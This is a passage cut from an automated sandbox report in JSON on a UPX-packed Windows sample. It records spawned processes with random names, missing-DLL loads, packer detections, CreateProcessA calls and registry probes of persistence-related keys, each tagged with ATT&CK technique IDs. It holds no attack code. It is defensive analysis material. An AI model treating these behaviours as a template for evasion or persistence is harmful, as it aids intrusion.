Status:c0000135]\n \"lxhhl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lxhhl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vhftp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vhftp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lhrhrpt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lhrhrpt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"0004664.exe\" (UID: 00000000-00005812)\n Spawned process \"4060800.exe\" (UID: 00000000-00006068)\n Spawned process \"482642.exe\" (UID: 00000000-00006112)\n Spawned process \"lthxxd.exe\" (UID: 00000000-00005940)\n Spawned process \"bbpbfhd.exe\" (UID: 00000000-00005952)\n Spawned process \"ntpbdh.exe\" (UID: 00000000-00005756)\n Spawned process \"rrjxnjh.exe\" (UID: 00000000-00005464)\n Spawned process \"004422.exe\" (UID: 00000000-00006136)\n Spawned process \"rlrbxrl.exe\" (UID: 00000000-00005992)\n Spawned process \"pnrdltb.exe\" (UID: 00000000-00006016)\n Spawned process \"hvjhb.exe\" (UID: 00000000-00004016)\n Spawned process \"xnpjdph.exe\" (UID: 00000000-00004280)\n Spawned process \"024648.exe\" (UID: 00000000-00002764)\n Spawned process \"640660.exe\" (UID: 00000000-00005892)\n Spawned process \"22404.exe\" (UID: 00000000-00004336)\n Spawned process \"4862082.exe\" (UID: 00000000-00003560)\n Spawned process \"fnvpbxr.exe\" (UID: 00000000-00003432)\n Spawned process \"njdbdxd.exe\" (UID: 00000000-00003540)\n Spawned process \"brrppv.exe\" (UID: 00000000-00003764)\n Spawned process \"20640.exe\" (UID: 00000000-00003840)\n Spawned process \"22260.exe\" (UID: 00000000-00001920)\n Spawned process \"408224.exe\" (UID: 00000000-00004160)\n Spawned process \"26064.exe\" (UID: 00000000-00003484)\n Spawned process \"2848464.exe\" (UID: 00000000-00004200)\n Spawned process \"hntdntx.exe\" (UID: 00000000-00003292)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"0004664.exe\" (UID: 00000000-00005812)\n Spawned process \"4060800.exe\" (UID: 00000000-00006068)\n Spawned process \"482642.exe\" (UID: 00000000-00006112)\n Spawned process \"lthxxd.exe\" (UID: 00000000-00005940)\n Spawned process \"bbpbfhd.exe\" (UID: 00000000-00005952)\n Spawned process \"ntpbdh.exe\" (UID: 00000000-00005756)\n Spawned process \"rrjxnjh.exe\" (UID: 00000000-00005464)\n Spawned process \"004422.exe\" (UID: 00000000-00006136)\n Spawned process \"rlrbxrl.exe\" (UID: 00000000-00005992)\n Spawned process \"pnrdltb.exe\" (UID: 00000000-00006016)\n Spawned process \"hvjhb.exe\" (UID: 00000000-00004016)\n Spawned process \"xnpjdph.exe\" (UID: 00000000-00004280)\n Spawned process \"024648.exe\" (UID: 00000000-00002764)\n Spawned process \"640660.exe\" (UID: 00000000-00005892)\n Spawned process \"22404.exe\" (UID: 00000000-00004336)\n Spawned process \"4862082.exe\" (UID: 00000000-00003560)\n Spawned process \"fnvpbxr.exe\" (UID: 00000000-00003432)\n Spawned process \"njdbdxd.exe\" (UID: 00000000-00003540)\n Spawned process \"brrppv.exe\" (UID: 00000000-00003764)\n Spawned process \"20640.exe\" (UID: 00000000-00003840)\n Spawned process \"22260.exe\" (UID: 00000000-00001920)\n Spawned process \"408224.exe\" (UID: 00000000-00004160)\n Spawned process \"26064.exe\" (UID: 00000000-00003484)\n Spawned process \"2848464.exe\" (UID: 00000000-00004200)\n Spawned process \"hntdntx.exe\" (UID: 00000000-00003292)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6\" was detected as \"UPX\" and name: \"Packer\"\n \"tfpfbjl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rjvxrf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"pttxvt.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"lnnjjb.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"jfrfbtr.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"bpbtb.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"pjbbvdd.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"pdnrb.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hpdnldp.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"xlrxxtf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rvhlvt.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"vxxfjr.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"dnxpf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"drbdjh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"lhrhrpt.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rtrnhfh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"vhftp.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"lxhhl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"fnrxft.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"dpndv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rxfxxnn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"xprhl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"npjbvrb.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"220404.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f46675@RPCRT4.dll\"\n \"15001600c03e206a@ADVAPI32.dll\"\n \"0e000f00703f206a@ADVAPI32.dll\"\n \"0e000f00cc3f206a@ADVAPI32.dll\"\n \"11001200b447206a@ADVAPI32.dll\"\n \"110012004848206a@ADVAPI32.dll\"\n \"120013008c48206a@ADVAPI32.dll\"\n \"12001300e448206a@ADVAPI32.dll\"\n \"14001500386e206a@ADVAPI32.dll\"\n \"14001500506e206a@ADVAPI32.dll\"\n \"14001500686e206a@ADVAPI32.dll\"\n \"17001800806e206a@ADVAPI32.dll\"\n \"0d000e00986e206a@ADVAPI32.dll\"\n \"11001200a86e206a@ADVAPI32.dll\"\n \"11001200bc6e206a@ADVAPI32.dll\"\n \"0f001000fc6f206a@ADVAPI32.dll\"\n \"140015003c70206a@ADVAPI32.dll\"\n \"140015005470206a@ADVAPI32.dll\"\n \"0c000d009c70206a@ADVAPI32.dll\"\n \"0c000d00ac70206a@ADVAPI32.dll\"\n \"0e000f00bc70206a@ADVAPI32.dll\"\n \"0e000f00cc70206a@ADVAPI32.dll\"\n \"0b000c00dc70206a@ADVAPI32.dll\"\n \"180019001473206a@RPCRT4.dll\"\n \"130014004073206a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"rrjxnjh.exe\" called \"CreateProcessA\" with parameter \"c:\\004422.exe\" - (UID: 00000000-00005464)\n \"004422.exe\" called \"CreateProcessA\" with parameter \"c:\\rlrbxrl.exe\" - (UID: 00000000-00006136)\n \"640660.exe\" called \"CreateProcessA\" with parameter \"c:\\22404.exe\" - (UID: 00000000-00005892)\n \"88060.exe\" called \"CreateProcessA\" with parameter \"c:\\8084222.exe\" - (UID: 00000000-00004080)\n \"rtrnhfh.exe\" called \"CreateProcessA\" with parameter \"c:\\lhrhrpt.exe\" - (UID: 00000000-00003748)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6\" has an executable section named \"UPX0\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6\" has an executable section named \"UPX1\"\n \"tfpfbjl.exe\" has an executable section named \"UPX0\"\n \"tfpfbjl.exe\" has an executable section named \"UPX1\"\n \"rjvxrf.exe\" has an executable section named \"UPX0\"\n \"rjvxrf.exe\" has an executable section named \"UPX1\"\n \"pttxvt.exe\" has an executable section named \"UPX0\"\n \"pttxvt.exe\" has an executable section named \"UPX1\"\n \"lnnjjb.exe\" has an executable section named \"UPX0\"\n \"lnnjjb.exe\" has an executable section named \"UPX1\"\n \"jfrfbtr.exe\" has an executable section named \"UPX0\"\n \"jfrfbtr.exe\" has an executable section named \"UPX1\"\n \"bpbtb.exe\" has an executable section named \"UPX0\"\n \"bpbtb.exe\" has an executable section named \"UPX1\"\n \"pjbbvdd.exe\" has an executable section named \"UPX0\"\n \"pjbbvdd.exe\" has an executable section named \"UPX1\"\n \"pdnrb.exe\" has an executable section named \"UPX0\"\n \"pdnrb.exe\" has an executable section named \"UPX1\"\n \"hpdnldp.exe\" has an executable section named \"UPX0\"\n \"hpdnldp.exe\" has an executable section named \"UPX1\"\n \"xlrxxtf.exe\" has an executable section named \"UPX0\"\n \"xlrxxtf.exe\" has an executable section named \"UPX1\"\n \"rvhlvt.exe\" has an executable section named \"UPX0\"\n \"rvhlvt.exe\" has an executable section named \"UPX1\"\n \"vxxfjr.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6\" has an writable section named \"UPX0\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6\" has an writable section named \"UPX1\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6\" has an writable section named \"UPX2\"\n \"tfpfbjl.exe\" has an writable section named \"UPX0\"\n \"tfpfbjl.exe\" has an writable section named \"UPX1\"\n \"tfpfbjl.exe\" has an writable section named \"UPX2\"\n \"rjvxrf.exe\" has an writable section named \"UPX0\"\n \"rjvxrf.exe\" has an writable section named \"UPX1\"\n \"rjvxrf.exe\" has an writable section named \"UPX2\"\n \"pttxvt.exe\" has an writable section named \"UPX0\"\n \"pttxvt.exe\" has an writable section named \"UPX1\"\n \"pttxvt.exe\" has an writable section named \"UPX2\"\n \"lnnjjb.exe\" has an writable section named \"UPX0\"\n \"lnnjjb.exe\" has an writable section named \"UPX1\"\n \"lnnjjb.exe\" has an writable section named \"UPX2\"\n \"jfrfbtr.exe\" has an writable section named \"UPX0\"\n \"jfrfbtr.exe\" has an writable section named \"UPX1\"\n \"jfrfbtr.exe\" has an writable section named \"UPX2\"\n \"bpbtb.exe\" has an writable section named \"UPX0\"\n \"bpbtb.exe\" has an writable section named \"UPX1\"\n \"bpbtb.exe\" has an writable section named \"UPX2\"\n \"pjbbvdd.exe\" has an writable section named \"UPX0\"\n \"pjbbvdd.exe\" has an writable section named \"UPX1\"\n \"pjbbvdd.exe\" has an writable section named \"UPX2\"\n \"pdnrb.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"tfpfbjl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rjvxrf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"pttxvt.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"lnnjjb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"jfrfbtr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"bpbtb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"pjbbvdd.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"pdnrb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hpdnldp.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"xlrxxtf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rvhlvt.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"vxxfjr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"dnxpf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"drbdjh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"lhrhrpt.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rtrnhfh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"vhftp.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"lxhhl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"fnrxft.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"dpndv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rxfxxnn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"xprhl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"npjbvrb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"220404.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"0004664.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"0004664.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0004664.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0004664.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"0004664.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"0004664.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" reads file \"c:\\604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\"\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" reads file \"c:\\0004664.exe\"\n \"0004664.exe\" reads file \"c:\\0004664.exe\"\n \"0004664.exe\" reads file \"c:\\4060800.exe\"\n \"4060800.exe\" reads file \"c:\\4060800.exe\"\n \"4060800.exe\" reads file \"c:\\482642.exe\"\n \"482642.exe\" reads file \"c:\\482642.exe\"\n \"482642.exe\" reads file \"c:\\lthxxd.exe\"\n \"lthxxd.exe\" reads file \"c:\\lthxxd.exe\"\n \"lthxxd.exe\" reads file \"c:\\bbpbfhd.exe\"\n \"bbpbfhd.exe\" reads file \"c:\\bbpbfhd.exe\"\n \"bbpbfhd.exe\" reads file \"c:\\ntpbdh.exe\"\n \"ntpbdh.exe\" reads file \"c:\\ntpbdh.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\0004664.EXE\"; Key: \"\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\\APPCERTDLLS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"0004664.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"4060800.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"482642.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lthxxd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"bbpbfhd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ntpbdh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rrjxnjh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"004422.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rlrbxrl.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"pnrdltb.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hvjhb.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xnpjdph.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"024648.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"640660.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"22404.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"4862082.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"fnvpbxr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"njdbdxd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"brrppv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"20640.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"22260.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"408224.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"26064.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"2848464.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"604216B59F6785B80A8A58229E2743CF659584A2378B30111E168CBE7C2BD3A6\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" (Access type: \"QUERYVAL\"; Path: 